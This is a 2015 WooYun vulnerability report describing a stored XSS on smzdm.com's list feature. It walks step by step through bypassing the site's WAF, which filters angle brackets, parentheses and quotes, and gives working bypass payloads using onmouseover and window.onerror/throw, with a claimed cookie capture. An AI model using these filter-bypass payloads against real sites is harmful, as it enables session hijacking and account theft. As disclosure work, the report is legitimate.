当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108358

漏洞标题:什么值得买再次绕过加速乐,储存XSS获取什么值得买cookie

相关厂商:smzdm.com

漏洞作者: catcat520

提交时间:2015-04-21 13:34

修复时间:2015-04-26 13:36

公开时间:2015-04-26 13:36

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

有加速乐的防御,程序发开也过滤了很多,设置了不少限制,还是可以绕过的,已领取到厂商上次发来的礼物,如果可以给个高rank,充值点话费什么的,谢谢了

详细说明:

详细说明看漏洞证明

漏洞证明:

之前已经说过了加速乐做了反射型XSS的防御,在储存型XSS测试过程中发现也过滤了一些关键字
1.创建我的清单 http://www.smzdm.com/user/qingdan
2.编辑清单进行测试 abcde<(")[']#\/=;> 反回 abcde 看来尖括号已经被过滤了

1.png


3.继续测试 abcde(")[']#/=; 返回 abcde(")[']#/=; 没有过滤
4.但怎么利用呢?查看源码处,

<a title="赞" id="love_rating_9_4116" class="zan" href="javascript:void(0);" onclick="ajax_love(4116,9,this);ga('send', 'event','值友清单','详情_赞','4116_abcde(\")[\']#/=;');"><i class="icon-zan"><!--[if lt IE 8]>赞<![endif]--></i><span class="scoredInfo">已赞</span><span class="addNumber add">+1</span></a>


5.按赞的地方没有过滤所以我们可以写代码,用 onmouseover 当鼠标点赞时触发
6.不过事情往往不是想象中那么简单的
7.插个代码试试

ssx" onmouseover=alert();


8.报错,测试发现拦截了与()关联语句

2.png


9.既然过滤了圆括号,那我们用 throw 抛出异常吧
先看看 throw 的构造语句是如何的

<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw'=alert\x282\x29';>


10.实际上直接插进去并不成功,为什么呢,从返回的源代码我们清晰看到问题
' 和 " 都被转换成了 

\' 和 \"

\\
11.至此 <>尖括号,() 圆括号,' 单引号," 双引号 都被过滤了,我们是不是要就此放弃呢
12.山重水复疑无路,柳暗花明又一村
13.我们就用 [] 来方括号来完成这次测试,成功弹框,注意 ] 后面要加空格用以隔离后面的代码

ssx" onmouseover=javascript:window.onerror=alert;throw[/xss/]


3.png


14.然后就是抓 cookie 了

4.png


15.已领取到厂商上次发来的礼物,如果可以给个高rank,充值点话费什么的,谢谢了

修复方案:

完善过滤

版权声明:转载请注明来源 catcat520@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-26 13:36

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论